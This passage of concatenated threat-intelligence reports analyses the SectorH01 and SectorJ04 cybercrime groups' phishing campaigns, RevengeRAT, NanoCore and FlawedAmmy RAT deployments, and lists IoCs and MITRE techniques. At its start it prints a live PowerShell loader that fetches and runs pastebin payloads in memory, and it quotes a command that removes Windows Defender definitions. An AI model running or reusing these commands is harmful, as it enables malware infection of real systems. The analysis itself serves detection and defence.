do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/QppWFhGC’)|IEX;[Byte[]]$f=[Microsoft.VisualBasic.Interaction]::CallByname((New-Object Net.WebClient),’DownloadString’,[Microsoft.VisualBasic.CallType]::Method,’https://pastebin.com/raw/Q8g1d6Be’).replace(‘)&*^’,’0x’)|IEX;$obj =@(‘MSBuild.exe’,$f);$g22=$a.GetType(‘THC452563sdfdsdfgr4777cxg04477fsdf810df777’);$y=$g22.GetMethod(‘retrt477fdg145fd4g0wewerwedsa799221dsad4154qwe’);$j=[Activator]::CreateInstance($g22,$null);$y.Invoke($j,$obj)

After looking at the various scripts used, we observed these obfuscated JavaScript code mainly serving one or more of these purposes:

  • Terminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes Windows Defender processes MSASCuiL.exe and MpCmdRun.exe
  • Interfering with Windows Defender via command “MpCmdRun.exe -removedefinitions -dynamicsignatures”
  • Setting Registry Autorun Persistence to execute mshta.exe on a Pastebin url
  • Setting Scheduled Task Persistence to execute mshta.exe on a Pastebin url
  • Executing malware in memory, sometimes in Microsoft’s .NET MSBuild.exe

In most cases, SectorH01 group in fact performed all of the above and sometimes multiple of the above by stacking multiple Pastebin urls and multiple commands in a single url. Moreover, since SectorH01 group is using the “Hagga” Pastebin account which has the ability to perform edits on the user’s pastes, they at times modify the paste to perform different actions. Below is the attack flow using this sample Excel file as an example.

SiteAction
www[.]bitly[.]com/adsodeasdaRedirect to https://xasjow21d[.]blogspot.com/p/14[.]html
https://xasjow21d[.]blogspot.com/p/14[.]html mshta.exe http://www[.]pastebin[.]com/raw/8uJavttD
http://www[.]pastebin[.]com/raw/8uJavttD (1) MpCmdRun.exe -removedefinitions -dynamicsignatures
(2) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe / MSASCuiL.exe / MpCmdRun.exe
(3) Run https://pastebin[.]com/raw/7EdEuebH via PowerShell
(4) Run http://pastebin[.]com/raw/ri21rHbF via mshta.exe
http://pastebin[.]com/raw/ri21rHbFDeobfuscates to RevengeRAT (CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856)
http://pastebin[.]com/raw/ri21rHbF [Paste Edit 1](1) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe
(2) Set Registry Autorun Persistence to execute
mshta.exe http://pastebin[.]com/raw/2gY9SAwU
(3) Set Scheduled Task Persistence to execute
mshta.exe http://pastebin[.]com/raw/qZXnhtQG
(4) Set Scheduled Task Persistence to execute
mshta.exe http://pastebin[.]com/raw/Htp0LKHg
http://pastebin[.]com/raw/ri21rHbF [Paste Edit 2] (1) ping Google
(2) Run https://pastebin[.]com/raw/QppWFhGC via Reflection
(3) Run https://pastebin[.]com/raw/Q8g1d6Be
replace(‘)&*^’,’0x’) via Reflection
http://pastebin[.]com/raw/2gY9SAwU Self.close()
http://pastebin[.]com/raw/qZXnhtQG (1) Execute https://pastebin[.]com/raw/13AGuyHY
via Reflection
(2) Execute k.Hackitup() in https://pastebin[.]com/raw/0e5uVXL0
replace(‘#@!’,’0x’) via Reflection
http://pastebin[.]com/raw/Htp0LKHg Self.close()
https://pastebin[.]com/raw/QppWFhGC Deobfuscates to a code injector (E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393)
Obfuscated with ConfuserEx
https://pastebin[.]com/raw/Q8g1d6Be Deobfuscates to NanoCore (E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E)
Obfuscated with Eazfuscator
https://pastebin[.]com/raw/13AGuyHY Deobfuscates to a code injector (84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6)
Obfuscated with ConfuserEx
https://pastebin[.]com/raw/0e5uVXL0 Deobfuscates to NanoCore (94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197)
Obfuscated with Eazfuscator

Usage of bit.ly, blogspot and pastebin allows SectorH01 group to be less traceable on the infrastructure side, but it is because of this that we know their pastes center around the “hagga” user these days. As long as Pastebin tolerates this user, they are likely to continue using the account because Pastebin pro accounts are no longer for sale.

But as pastes can be easily removed by incoming abuse reports, the SectorH01 group hedges their risk by getting to connect to multiple unlisted pastes. We see this same hedging they perform on their target endpoints, where they put multiple layers of persistence, use more than one type of RAT at the initial stage, and connect to multiple servers.

RevengeRAT

RevengeRAT is a RAT which has its malware builder and source code publicly available. It is set to use the C2 address ontothenextone[.]duckdns[.]org.

Some of the configuration settings of this RevengeRAT variant

RevengeRAT uses Base64 encoding for its C2 traffic and this information is easily decoded. From the configuration settings, we see the key variable “Revenge-RAT” and the SPL variable “-]NK[-“, both of which are used as delimiters between the Base64 encoded data.

Information sent to the C2 in a past packet capture of this sample which can be easily decoded

NanoCore

NanoCore is a RAT which was available for sale from 2014-2016 and has been leaked over the years. While the developer of NanoCore was arrested and sentenced last year, the RAT is still used by attackers.

In this case, the two NanoCore samples we found encoded in Pastebin sites attempted to connect to the C2 addresses attilabanks[.]ddns[.]net and yakka[.]duckdns[.]org. The C2 traffic of NanoCore is known to use the DES algorithm for encryption.I

Summary

SectorH01 is a threat group which in most cases, targets seemingly indiscriminately at enterprise users; even when they target for espionage, their TTPs have been known to stay fairly constant. They remain brazen in their attacks although we see a slight improvement in their operational security, and still use relatively simple tricks such as macros, known and detected RATs but in-memory only, and connect to domains such as Pastebin and dynamic DNS servers which should raise red flags or at least questions. All of these should be opportunities for organizations to detect the SectorH01 group.

Indicators of Compromise (IoCs)

Malicious Documents (SHA-256)

b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d
c763340ae4acecd3e7d85b118bbad6bb4b1d433a6398571afd4c2c27a304ab4e
e83304a5ae3e6ef366858c48aa8706d8e088aba86c724d575b4ad2e0ebaea7cd
d757406ae30d7822ebe63c28ff09ac7b1eca1a0e37e6f706c442f4f7517a624b
399b7823b707ac07c65940a30e85bdf5c0c7ed1bba5b5034ebcf189937636a44

RevengeRAT (SHA-256)

CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856

NanoCore (SHA-256)

94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197
E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E

Code Injectors (SHA-256)

84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6
E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393

C2 Domains

ontothenextone[.]duckdns[.]org
haggapaggawagga[.]duckdns.org
attilabanks[.]ddns[.]net
yakka[.]duckdns[.]org

Abused Legitimate Services

bitly[.]com/aswoesx2yxwxxd
bitly[.]com/adsodeasda
bitly[.]com/uiQSQWSQWSNnase
bitly[.]com/aswoeosXxxwxhh
xaasxasxasx[.]blogspot[.]com/p/kudi[.]html
xasjow21d[.]blogspot[.]com/p/14[.]html
axxwnxiaxs[.]blogspot[.]com/p/13[.]html
pastebin[.]com/raw/wZSPpxaG
pastebin[.]com/raw/2gY9SAwU
pastebin[.]com/raw/qZXnhtQG
pastebin[.]com/raw/Htp0LKHg
pastebin[.]com/raw/13AGuyHY
pastebin[.]com/raw/0e5uVXL0
pastebin[.]com/raw/8uJavttD
pastebin[.]com/raw/7EdEuebH
pastebin[.]com/raw/ri21rHbF
pastebin[.]com/raw/QppWFhGC
pastebin[.]com/raw/Q8g1d6Be
pastebin[.]com/raw/VpKuzs3R
pastebin[.]com/raw/kqm60tX5
pastebin[.]com/raw/3pEVfu9k
pastebin[.]com/raw/3VNZw83B
pastebin[.]com/raw/8Q050Drg
pastebin[.]com/raw/jX4MuzmX

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1173 Dynamic Data Exchange
T1106 Execution through API
T1203 Exploitation for Client Execution
T1170 Mshta
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1108 Redundant Access
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1089 Disabling Security Tools
T1054 Indicator Blocking
T1202 Indirect Command Execution
T1112 Modify Registry
T1170 Mshta
T1045 Software Packing
T1055 Process Injection
T1064 Scripting
T1108 Redundant Access
T1102 Web Service

Credential Access

T1056 Input Capture
T1081 Credentials in Files
T1241 Credentials in Registry

Discovery

T1016 System Network Configuration Discovery
T1033 System Owner/User Discovery
T1057 Process Discovery
T1063 Security Software Discovery
T1082 System Information Discovery
T1083 File and Directory Discovery

Collection

T1056 Input Capture
T1123 Audio Capture
T1125 Video Capture

Command and Control

T1032 Standard Cryptographic Protocol
T1065 Uncommonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

References

[1] The Daily Beast – FBI Arrests Hacker Who Hacked No One
https://www.thedailybeast.com/fbi-arrests-hacker-who-hacked-no-one

SectorJ04 Group’s Increased Activity in 2019

Abstract

SectorJ04 is a Russian-based cybercrime group that began operating about five years ago and conducted hacking activities for financial profit using malware such as banking trojans and ransomware against national and industrial sectors located across Europe, North America and West Africa.

In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors located across Southeast Asia and East Asia, and is changing the pattern of their attacks from targeted attacks to searching for random victims. This report includes details related to the major hacking targets of the SectorJ04 group in 2019, how those targets were hacked, characteristics of their hacking activities this year and recent cases of the SectorJ04 group’s hacking.

SectorJ04 group activity range and hacking methods

The SectorJ04 group has maintained the scope of its existing hacking activities while expanding its hacking activities to companies in various industrial sectors located in East Asia and Southeast Asia. There was a significant increase in their hacking activities in 2019, especially those targeting South Korea. They mainly utilize spam email to deliver their backdoor to the infected system that can perform additional commands from the attacker’s server.

Main countries and sectors targeted

The SectorJ04 group’s preexisting targets were financial institutions located in countries such as North America and Europe, or general companies such as retail and manufacturing, but they recently expanded their areas of activity to include the medical, pharmaceutical, media, energy and manufacturing industries. They do not appear to place much restrictions on the sectors targeted. The following are the sectors and countries under which SectorJ04 group was found in 2019.

Figure 1 SectorJ04 group’s first half activity timeline in 2019

Targeted Countries

We saw SectorJ04 group activity in Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria, Bangladesh

Figure 2 SectorJ04 group targeted countries

Targeted Industries

  • Financial-related corporate and government departments such as banks and exchanges
  • Retail business such as shopping malls and social commerce
  • Educational institutions such as a universities
  • Manufacturing companies such as manufactures of electronic products
  • Media companies such as broadcasting and media
  • Pharmaceutical and biotechnology-related companies
  • A job-seeking company
  • Energy-related companies such as urban gas and wind power generation

Hacking Techniques

The SectorJ04 group mainly utilizes a spear phishing email with MS Word or Excel files attached, and the document files downloads the Microsoft Installer (MSI) installation file from the attacker server and uses it to install backdoor on the infected system. As anti-virus programs have recently begun to detect MSI files, in some instances macro scripts contained in the malicious documents would install backdoors directly onto infected systems without using MSI files.

Figure 3 Schematic drawing for SectorJ04 group’s hacking method

Malicious documents used for hacking are mainly written as themes related to MS Office, and the same themes are often used several times, with only language changes depending on the victim’s language.

In addition, the MSI files backdoor used by SectorJ04 mostly had valid digital signatures, and most of their malware were signed just days before they were found.

Figure 4 Part of the malicious document execution screen that the SectorJ04 group attaches to the spear phishing email
Figure 5 Part of the digital signature found in the executable used for hacking

Digital signature information found in malware

  • VAL TRADEMARK TWO LIMITED
  • ALLO LTD
  • COME AWAY FILMS LTD
  • AWAY PARTNERS LIMITED
  • ANG APPCONN LIMITED
  • START ARCHITECTURE LTD
  • SLON LTD
  • DIGITAL DR
  • FIT AND FLEX LIMITED
  • Dream Body Limited
  • BOOK A TEACHER LTD
  • MARK A EVANS LTD
  • WAL GRAY LTD
  • MISHA LONDON LTD
  • START ARCHITECTURE LT
  • BASS AUTOMOTIVE LIMITE
  • FILESWAP GLOBAL LT
  • HAB CLUB LT
  • ET HOMES LT

Main Malware Used

The SectorJ04 group mainly used their own backdoor, ServHelper and FlawedAmmy RAT, for hacking. They also used the Remote Manipulator System (RMS) RAT, a legitimate remote management software created in Russia. Backdoors are installed in infected systems and they also distributed email stealers, botnet malware and ransomware through those backdoors.

They were recently confirmed to use additional backdoor called AdroMut and FlowerPippi, which is used to install other backdoor such as FlawedAmmy RAT on behalf of the MSI file, or to collect system information and send it to the attacker’s server.

Malware Types Found Before 2019

ServHelperFlawedAmmy RATRMS RAT
Initial Infection MethodAn MSI file that is downloaded from a document file attached to a spear phishing email.
Downloaded by MSINullsoft InstallerEncoded FlawedAmmy RATSFX File
CharacteristicC2 response has certain separatorCheck for Antivirus
Register AutoPlay with “wsus.exe”
Utilize configuration files in DAT formats

Malware Types Found After 2019

AdroMutFlowerPippi
Initial Infection MethodDocument files attached to the spear phishing emails
CharacteristicsInternal-used strings are decoded into AES-256-ECB mode after base64 decode.
Configure infection system information in JSON format (encrypted)
Load into “ComputerDefaults.exe” using DLL side loading technique
A simpler function than hard-coded RC4 key AdroMut

Backdoor installed in the infected system distributed additional botnet malware, ransomware and email stealers. The email stealer collects connection protocol information and account information, such as SMTP, IMAP, and POP3, which are stored in the registry by Outlook and Thunderbird mail clients and sends them to the attacker server in a specific format.

Figure 6 Format to send email credentials collected by email stealer
Figure 7 Some of the email stealer codes that access email account information stored in the registry
Figure 8 Some of the email stealer codes that access email account information stored in the registry 2

An email stealer may also have a file collection function to collect email information that is recorded in the metadata of the file corresponding to the hard-coded extension. In addition, the malware eventually creates and executes a batch file for self-delete, removing the execution traces from the infected PC.

Figure 9 Some of the file extensions that the email stealer collects data from

The SectorJ04 group is believed to collect email accounts stored in infection systems for use in subsequent attacks.

Characteristics of hacking activities of SectorJ04 group in 2019

The following are the features of the first half of 2019 activities identified through the analysis of the SectorJ04 group’s hacking activities.

  • Increased hacking activities targeting East and Southeast Asia
  • Changes in spam email format and hacking methods
  • Changes in targets of hacking from specific organizations and industry groups to large number of irregular ones

Although the SectorJ04 group mainly targeted countries located in Europe or North America, it has recently expanded its field of activities to countries located in Southeast Asia and East Asia. In particular, the frequency of hacking attacks targeting South Korea has increased, and spam emails targeting China were found in May.

The changes could also be seen in attachments to spam emails used by attackers. Existing spam emails used attachments in the form of malicious documents, but attachments with HTM and HTML extensions were also found and the text included links to download malicious documents directly.

The SectorJ04 group’s initial spam emails had no mail content or only short sentences, but the latest spam emails found were elaborately written and included images. A new type of backdoor called AdroMut and a new malware called FlowerPippi was also found coming from SectorJ04.

Prior to 2019, the SectorJ04 group conducted large-scale hacking activities for financial gain using exploit kits on websites to install ransomware, such as Locky and GlobeImporter, along with its banking Trojan, on its victims computers. But after 2019 the group has changed its hacking strategy to attack using spam email. In particular, a number of remote control malware are utilized to gain access to resources such as email accounts and system login information from the infected machine to send more spam emails and distribute their malware.

Increased hacking activities targeting East and Southeast Asia

The hacking activities of SectorJ04 group, which targeted South Korea in the first half of 2019, have been continuously discovered. The emails found were written in relation to invoice and tax accounting data, and were attached the MS Word or Excel files with malicious macros inserted. Malicious documents written in Korean have the same characteristics as other language hacking activities under the theme of MS Office.

Figure 10 Spear phishing emails disguised as order sheets

In June 2019, continuous hacking activities targeting South Korea were found again and spam emails were written with various contents, including transaction statements, receipts and remittance cards. During that period, a number of spam emails disguised as remittance cards of the same type were found.

Figure 11 Spear phishing email disguised as a remittance card

The SectorJ04 group has carried out large-scale hacking activities targeting South Korea, while also expanding the field of attacks to Southeast Asian countries such as Taiwan and the Philippines. Spam emails and attachments written in Chinese were found in May, and the SectorJ04 group at that time targeted industrial sectors such as electronics and telecommunications, international schools and manufacturing.

Figure 12 Spear phishing emails written in Chinese
Figure 13 Malicious excel file execution screen written in Chinese

Changes in spam email format and hacking methods

In June, SectorJ04 group conducted hacking using spam emails written in various languages, including English, Arabic, Korean and Italian, and the emails were written with various contents, including remittance card, invoice and tax invoice.

Along with the existing method of using MS Word or Excel files as attachments, they used HTML files to download malicious documents as attachments, or included links to download malicious documents directly in the text.

In the past, the emails used in attacks had little or no content, but the latest ones use elaborated spam emails for hacking, such as using images.

Figure 14 Spear phishing email disguised as bank statement
Figure 15 Spear phishing email disguised as a hospital certificate

Changes have also been found in the hacking method of the SectorJ04 group. In addition to their preexist backdoor, ServHelper and FlawedAmmy, they have also been confirmed to use the backdoor called AdroMut and FlowerPippi.

AdroMut downloads the malware (ServHelper and FlawedAmmy RAT) used by the SectorJ04 group from the attacker server and simultaneously performs the functions of a backdoor.

FlowerPippi collects infection system information, such as the domain of the infected system, proxy settings, administrator rights, and OS version, and performs functions such as executing commands received, downloading and executing DLL and EXE files.

Figure 16 Encoded Strings on the AdroMut Backdoor
Figure 17 RC4 key with hard-coded view from the FlowerPippi back door

The SectorJ04 group is believed to have developed and used malware that functions as a downloader for the purpose of installing or downloading malware to replace the MSI installation files that they have used for hacking for more than six months as the detection rate of security solutions increased.

Figure 18 Some of the digital certificate information identified in the corresponding hacking activity

The SectorJ04 group, which has been utilizing the same pattern of infection and the same malware for more than six months, is believed to be attempting to change its infection methods such as downloading malware directly from malicious documents without using MSI installation files, changing their spam email format and using new types of backdoor.

Changes in hacking targets from specific organizations and industries to random ones

Until 2019, SectorJ04 group had carried out massive website-based hacking activities that mainly utilize ransomware and banking trojans for financial profit, and has also been carrying out information gathering activities to secure attack resources such as email accounts and system login information from users since 2019.

This allows them to expand their range of targets of hacking activities for financial profit, and in this regard, SectorJ04 group has been found to have hacked into a company’s internal network by using a spear phishing email targeting executives and employees of certain South Korean companies around February 2019.

They eventually hacked the Active Directory (AD) server and took control of the entire corporate internal network, and then distributed the Clop ransomware on the AD server. From the hacking activity, we also found malware for collecting email information and “AmadeyBot”, a botnet malware that which has its source code available in Russia’s underground forums.

Figure 19 Spear phishing email used for hacking activities targeting AD servers in South Korea

They are believed to have continuously attempted to hack into companies in South Korea to distribute Clop ransomware. Attackers used spam emails disguised as being sent by the National Tax Service in May to install FlawedAmmy RAT in the infected system, during which the Clop ransomware was found using the same certificate as the FlawedAmmy RAT executable file.

Figure 20 Spear phishing email disguised as tax bill

The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam.

Major Malware Installation Types

The following describes three types of backdoor infections that are installed from malicious documents identified in the SectorJ04 group-related hacking cases that occurred during the first half of 2019.

Type 1 – Using encoded executable file

SectorJ04 group carried out intensive hacking on various industrial sectors, including South Korea’s media, manufacturing and universities, around February and March 2019. They used the spear phishing email to spread malicious Excel or malicious Word files, and downloaded the MSI files from the attacker’s server when the malicious documents were run.

The MSI file installs a downloader that downloads FlawedAmmy RAT encoded in the infection system from the attacker server, and the downloaded FlawedAmmy RAT registers an automatic execution under the name “wsus.exe.”

Figure 21 Type of backdoor installation to install encoded executable file Type 1

FlawedAmmy RAT performs remote control functions in the infected system and decodes encoded executable files downloaded from the attacker server using certain hard-coded strings. It also has a function to check if a particular process is running to determine whether their malware should be executed.

Figure 22 “Ammy Admin” string found in FlawedAmmy RAT
Figure 23 Part of decode code that uses hard-coded strings

Type 2 – Using NSIS Script

SectorJ04 group conducted hacking activities targeting financial institutions located in India and Hong Kong around April 2019. Malicious documents delivered through the spear phishing email downloaded the MSI file, which forwards the NSIS Installer to the infected system. The NSIS script executes the final payload, ServHelper, in the DLL file format, using “rundll32.exe”.

Note that NSIS (Nullsoft Scriptable Install System) is a script-based installation system for Windows and is a lightweight installation system supported by Nullsoft.

Figure 24 Backdoor installation type utilizing NSIS Installer Type 2

Decompressing the NSIS installer installed by the MSI file shows that it consists of an NSIS script with an NSI extension, a ServHelper in the DLL file format, and a “ncExec.dll,” the normal DLL required to run the NSIS.

Figure 25 Uncompressed NSIS installer
Figure 26 Part of the NSIS script for running ServHelper in the DLL file format

ServHelper performs the function of the backdoor in the infection system and sends specific types of responses to C2 servers using delimiters such as “key,” “sysid,” and “resp”. Different types of delimiters are sometimes found depending on malware.

Figure 27 ServHelper Backdoor C2 Communication Code Partial

Type 3 – Using Self-Extracting File

SectorJ04 group carried out hacking activities targeting financial institutions located in Italy and other countries around May 2019. Malicious documents delivered through the spear phishing email pass MSI files to the infection system, and MSI files download the executable self-extracting file (SFX). When the SFX file is executed, another SFX file inside is executed and the final payload, RMS RAT, is delivered to the infected system.

Figure 28 Backdoor installation type utilizing SFX executable files Type 3

Within the first SFX file to be downloaded by the MSI file, there are four files. When executing an SFX file, it uses a command to change the extension of the SFX file (“kernel.dll”) of the DLL extension to EXE and decompress it using a hard-coded password. The files that make up the SFX file vary from malware to malware.

Figure 29 The first SFX file to be downloaded from an MSI file
Figure 30 “i.cmd” for decompression of the second SFX file

Four files can be seen in the second SFX file that has been decompressed, and as before, running “exit.exe”. “exit.exe” executes the same “i.cmd” as before, which executes an RMS RAT with the file name “winserv.exe” in the registry. RMS RAT is a legitimate remote management software created in Russia, and files with DAT extensions contain configuration information to run the RMS RAT.

Figure 31 Configuring a second SFX file disguised as a DLL file extension
Figure 32 RMS RAT configuration file with a DAT extension

SectorJ04 Group Activity in South Korea

The following is about the activities of the SectorJ04 group found in South Korea in July and August 2019.

Hacking activities disguised as electronic tickets by large airlines

In late July, SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in sectors such as education, job openings, real estate and semiconductors in South Korea. Spam emails targeting email accounts used in the integrated mail service of public officials were also found in the hacking activity.

Figure 33 Spam email disguised as electronic tickets

They used spam emails disguised as those sent by large South Korean airlines and used ISO-format files as attachments. The group used the same body contents of the email to deliver spam emails to multiple hacking targets.

Decompressing the ISO file attached to the spam email would show an SCR file disguised as a “.pdf” extension exists, which is a .NET executable file that downloads an MSI file. The ISO files sometimes contain LNK files, which, like the malware written in .NET, download an MSI files from a remote location.

Figure 34 A disguised SCR file identified within an ISO file
Figure 35 MSI file downloader written as .NET
Figure 36 Disguised LNK file identified within ISO file

The following valid digital signatures were found in the MSI file downloaded from the attacker server. Other digital signatures were also found issued by “HAB CLUB LT” and “LUK 4 TRANSPORT LT”.

Figure 37 Digital signature information for MSI files found in hacking activities

Finally, FlawedAmmy RAT is downloaded from the remote server and the activity uses a Base64 encoded Powershell script to determine if the infected system is a PC contained in an Active Directory Domain.

Figure 38 Powershell script to determine if a PC belongs to a domain

Hacking activity using same email content as the past

In early August, the SectorJ04 group carried out extensive hacking activities targeting the users around the world, including South Korea, India, Britain, the United States, Germany, Canada, Argentina, Bangladesh and Hong Kong.

Their activities were particularly heavy in healthcare-related areas such as healthcare, pharmaceuticals, biotechnology and healthcare-wage management, as well as energy-related companies such as gas and wind power. Also, they continued their attacks on preexisting hacking target areas such as manufacturing, distribution and retail.

The contents of the text written in French and English were found in the spam email, and an MS Word file with random numbers was used as an attachment. All emails found in the hacking activity had the same text content.

Figure 39 Spear phishing emails written in French and English

Spam emails in Korean were also identified in the hacking activity, indicating that the contents of the text of the email used in the hacking activity were reused in June. Attached file is an MS Word file titled “스캔_(random number).doc”.

Figure 40 Spear phishing email targeted to South Korea using the same text used in the past

The MS Word file used as an attachment is disguised as an order confirmation and a goods receipt. Running the macro from the document would allow the downloader with the DLL file format to run using “rundll32.exe”. The downloader downloads FlawedAmmy RAT from the attacker server and runs under the name “rundl32.exe”.

Figure 41 Malicious document execution screen disguised as order confirmation
Figure 42 Malicious document execution screen for Korea language users disguised as a receipt of goods
Figure 43 Part of the macro script included in the malicious document

FlawedAmmy RAT found in the hacking activity showed the existing “Ammyy Admin” string being modified to “Popss Admin” and created Mutex with “KLGjigjuw4j892358u432i5”. In addition, the compile path “c:\\123\\123\\clear\\ammyygeneric\\target\\TrFmFileSys.h” was found inside the file.

Figure 44 Change hard-coded string information in FlawedAmmy RAT
Figure 45 Mutex generation code using hard-coded string information

In addition to the above mentioned changes in the FlawedAmmy RAT found in the most recent hacking activity, other changes such as changes in their string decoding were identified.

Conclusion

The SectorJ04 group’s range of targets increased sharply in 2019, and they appear to be striving to carry out elaborated attacks while at the same time targeting indiscriminately. They are one of the most active cyber crime groups in 2019, and they often modify and tweak their hacking methods and perform periodic hacking activities.

The SectorJ04 group’s hacking activities are expected to continue to increase, and the ThreatRecon team will continue to monitor the attack activity against the group.

Indicators of Compromise

IoCs of the SectorJ04 group included in the report can be found here.

More information about the SectorJ04 group is available to customers of ThreatRecon Intelligence Service (RA.global@nshc.net).

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these malware.

Initial Access

Spearphishing Attachment
Spearphishing Link
Trusted Relationship

Execution

Command-Line Interface
Execution through API
Execution through Module Load
Exploitation for Client Execution
PowerShell
Rundll32
Scheduled Task
Scripting
Service Execution
User Execution
Windows Management Instrumentation

Persistence

Account Manipulation
New Service
Registry Run Keys / Startup Folder
Scheduled Task
Startup items
System Firmware
Windows Management Instrumentation Event Subscription

Privilege Escalation

Bypass User Account Control
New Service
Scheduled Task
Startup items

Defense Evasion

Bypass User Account Control
Code Signing
Disabling Security Tools
DLL Side-Loading
Exploitation for Defense Evasion
Hidden Window
Modify Registry
Obfuscated Files or Information
Rundll32
Scripting
Software Packing
Virtualization/Sandbox Evasion

Credential Access

Account Manipulation
Input Capture
Input Prompt

Discovery

Account Discovery
File and Directory Discovery
Network Service Scanning
Network Share Discovery
Permission Groups Discovery
Process Discovery
Query Registry
Remote System Discovery
Security Software Discovery
System Information Discovery
System Network Configuration Discovery
System Network Connections Discovery
System Owner/User Discovery
System Service Discovery
Virtualization/Sandbox Evasion

Lateral Movement

Remote Desktop Protocol
Remote Services

Collection

Automated Collection
Data from Local System
Email Collection
Input Capture

Command and Control

Commonly Used Port
Custom Command and Control Protocol
Custom Cryptographic Protocol
Data Encoding
Remote Access Tools
Standard Application Layer Protocol
Standard Cryptographic Protocol

Exfiltration

Automated Exfiltration
Data Compressed
Exfiltration Over Alternative Protocol
Exfiltration Over Command and Control Channel

Intent

Data Encrypted for Impact

References

KRCERT – Analysis of Attacks on AD Server (2019.04.17)
https://www.krcert.or.kr/data/reportView.do?bulletin_writing_sequence=35006

Monthly Threat Actor Group Intelligence Report, June 2019

This is a summary of activity of suspected state sponsored Threat Actor Groups analyzed by the ThreatRecon Team, based on data and information collected from May 21 to June 20, 2019.

1. SectorA Activity Features

A total of three hacking groups, SectorA01, SectorA02, SectorA05 were found among SectorA hacking groups this June. The SectorA group was mainly active in the Middle East, Southeast Asia, and East Asia in June, targeting countries such as Jordan, Philippines, South Korea, and Japan.

The SectorA01 group mainly sent spear phishing emails to the Middle East and Southeast Asia which had Microsoft Office document files attached to them. However, in June, another case was discovered where they attached executable type malware that was disguised as a job application form.

The SectorA02 and SectorA05 groups are active mainly for monetary profit but based on their hacking techniques and malware features, each groups are aimed at different targets. The SectorA02 group mainly targets financial companies or companies related to cryptocurrency trading, but the SectorA05 group targets individuals who hold cryptocurrency. In the past, the two groups used spear phishing emails which attached malicious HWP or executable files. Recently, they have also used spear phishing emails impersonating cryptocurrency exchanges or government agencies.

Recently, the SectorA groups have been acting in parallel to target both diplomatic information related to their government and gain monetary benefits. In the past, they mainly targeted financial companies and cryptocurrency exchanges in order to earn monetary benefits. but nowadays they extended their range of hacking targets to include individual holders of cryptocurrency. Attention is needed as their range of activities expand.

2. SectorB Activity Features

SectorB groups are conducting campaigns in various countries around the world. In June, a total of six hacking groups were found to be active in SectorB. Activities of each group were found in the following countries: SectorB01 group activity was discovered in Southeast Asia and Europe, mainly in the Philippines, Netherlands, and Ukraine. SectorB03 group activity was discovered in the Middle East, mainly in Saudi Arabia. SectorB04 group activity was discovered in East Asia, Middle East and Europe, mainly in Taiwan, Philippines, Turkey, and Austria. SectorB06 group activity was discovered in the Middle East, mainly in Turkey and Kazakhstan. SectorB09 group activity was discovered in East Asia and North America, mainly in Japan, Hong Kong, Taiwan and Canada. SectorB14 group activity was discovered in East Asia and North America, mainly in the South Korea and the United States.

They maintain their existing hacking techniques – using Spear Phishing emails with malicious Microsoft Office document files attached. Recently, they also attacked Microsoft SharePoint servers and MySQL servers that are connected to the Internet using new vulnerabilities and web shells. In addition, new malware targeting the Linux operating system has been found.

In the past, SectorB groups focused more heavily on North America, but recently attacks in the Middle East, Southeast Asia and East Asia have also increased. We believe this is related to their recent political and diplomatic situations and it is likely that the hacking activities in the Middle East, Southeast Asia, East Asia will continue for the time being.

3. SectorC Activity Features

A total of three hacking groups, SectorC02, SectorC08, SectorC11 were found among the SectorC groups in June. They were active mainly in Europe – Moldova, Ukraine and Germany – where they frequently have political friction with. They are constantly using spear phishing emails with malware, but there are gradual changes in the characteristics of the attached executable files. They continue to use open source programs such as the remote control programs, UltraVNC, and start to develop their malware with open source code. This is presumably done to bypass security solutions and analyst detection, and also interferes with intelligence analysis efforts to track attackers. SectorC groups are expected to continue hacking activities in countries which it has political and diplomatic conflicts with for the time being.

4. SectorD Activity Features

In June, a total of two hacking groups were found among SectorD groups. They targeted countries in the Middle East which they have a politically competitive relation with. Activities of each group were found in the following countries: SectorD02 group activity was discovered extensively in Middle Asia to Middle East, mainly in Hong Kong, Sweden, Tajikistan, United Arab Emirates, Saudi Arabia, Iraq, Jordan, France, United States and Mexico. SectorD11 group activity was discovered in Middle Asia to Middle East.

